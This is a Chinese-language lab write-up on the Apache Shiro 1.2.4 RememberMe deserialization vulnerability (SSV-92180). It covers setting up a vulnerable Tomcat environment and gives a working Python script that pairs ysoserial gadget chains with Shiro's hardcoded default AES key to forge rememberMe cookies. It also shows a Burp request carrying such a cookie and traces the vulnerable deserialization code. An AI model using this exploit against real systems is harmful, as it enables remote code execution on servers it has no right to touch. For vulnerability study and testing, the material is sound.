Shiro RememberMe 1.2.4 反序列化漏洞(SSV-92180)

1、Shiro运行环境

Apache Shiro 是 Java 的权限及安全验证框架

下载地址:https://repo1.maven.org/maven2/org/apache/shiro/shiro-root/1.2.4/

修改pom.xml包中jstl和commons-beanutils的版本,用于配合漏洞执行环境

<dependency>
    <groupId>javax.servletgroupId>
    <artifactId>jstlartifactId>
    <version>1.2version>
    <scope>providedscope>
dependency>
<dependency>
    <groupId>commons-beanutilsgroupId>
    <artifactId>commons-beanutilsartifactId>
    <version>1.9.2version>
    <exclusions>
        <exclusion>
                <groupId>commons-logginggroupId>
                <artifactId>commons-loggingartifactId>
        exclusion>
    exclusions>
dependency>               

用IDEA打开该项目,自动安装依赖,并使用IDEA生成samples-web-1.2.4.war。

将war包放在tomcat的webapps目录,并命名为shiro.war。

apache-tomcat-7.0.104\bin\startup.bat加上调试接口,便于后续idea调试

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788

Shiro RememberMe 1.2.4 反序列化漏洞(SSV-92180)_第1张图片

双击启动startup.bat,如果tomcat报错,可能是调用了系统环境变量中的tomcat,删除系统环境变量中的tomcat即可。

2、打

需要一个dnslog,使用http://www.dnslog.cn/,或者本地启动一个;也可以使用弹计算器的方式,将注释去掉即可。

#借鉴,见参考
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    #popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme("yourdnslog.cn")
    # payload = encode_rememberme("calc.exe") #mac:open /Applications/Calculator.app
    print("rememberMe="+payload.decode())

查看ysoerial的利用链:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
     Payload             Authors                                Dependencies
     -------             -------                                ------------
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Clojure             @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                               commons-collections:3.1
     CommonsCollections2 @frohoff                               commons-collections4:4.0
     CommonsCollections3 @frohoff                               commons-collections:3.1
     CommonsCollections4 @frohoff                               commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                               groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.
7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, sp
ring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser                       js:1.7R2
     MozillaRhino2       @_tint0                                js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                              rome:1.0
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

使用burpsuite发包

GET /samples-web-1.2.4/ HTTP/1.1
Host: 10.73.195.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rememberMe=6NddOQxrQiSTDe6AeasbqzYjld5sj7SEHSgAQjaql20pXoxxOuTl13xO7gj49KQjhTMIKWAHxjQQUcc4DVHhynTuOw65lianxfS07Xx5mp76LdvyjPv0+VkzhZ/jRTex+ZvQeFjKMw9+8N9YXY2iVYZ/Xx3x8h/IQAPNiF9yaUNY3ExnCqpMJjj4/FG/AHkaLTdbT2ldtsOBs7g7jB9uNd/b6XOXvohpR3HvP1Vvurci5NT0TKTq+3ZXNoSio/iC77DHb8yKQfn3i5OBp9SRww/Idwi4a4udLSdvQiWd+xz+GQylgt0og76GmcbR0d9TGHk/tqEaxraruEu1+fKCVhZjJiYwebuM/2DDgRjVG6hOTdEahK/l96y+iB39+Www5+I8Kf7oz4H+sUzHDYinbg==
Upgrade-Insecure-Requests: 1

3、debug

路径shiro-web-1.2.4\WEB-INF\lib\shiro-core-1.2.4.jar!\org\apache\shiro\mgt\AbstractRememberMeManager.class

    public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) {
        PrincipalCollection principals = null;

        try {
            byte[] bytes = this.getRememberedSerializedIdentity(subjectContext);
            if (bytes != null && bytes.length > 0) {
                principals = this.convertBytesToPrincipals(bytes, subjectContext);
            }
        } catch (RuntimeException var4) {
            principals = this.onRememberedPrincipalFailure(var4, subjectContext);
        }

        return principals;
    }

进入convertBytesToPrincipals,进行解密

    protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
        if (this.getCipherService() != null) {
            bytes = this.decrypt(bytes);
        }
        return this.deserialize(bytes);
    }

解密函数

protected byte[] decrypt(byte[] encrypted) {
        byte[] serialized = encrypted;
        CipherService cipherService = this.getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.decrypt(encrypted, this.getDecryptionCipherKey());
            serialized = byteSource.getBytes();
        }
        return serialized;
    }

然后发序列化

protected PrincipalCollection deserialize(byte[] serializedIdentity) {
    return (PrincipalCollection)this.getSerializer().deserialize(serializedIdentity);
}

调用readobject

public T deserialize(byte[] serialized) throws SerializationException {
        if (serialized == null) {
            String msg = "argument cannot be null.";
            throw new IllegalArgumentException(msg);
        } else {
            ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
            BufferedInputStream bis = new BufferedInputStream(bais);

            try {
                ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
                T deserialized = ois.readObject();
                ois.close();
                return deserialized;
            } catch (Exception var6) {
                String msg = "Unable to deserialze argument byte array.";
                throw new SerializationException(msg, var6);
            }
        }
}

参考:

https://www.seebug.org/vuldb/ssvid-92180

你可能感兴趣的:(安全,安全)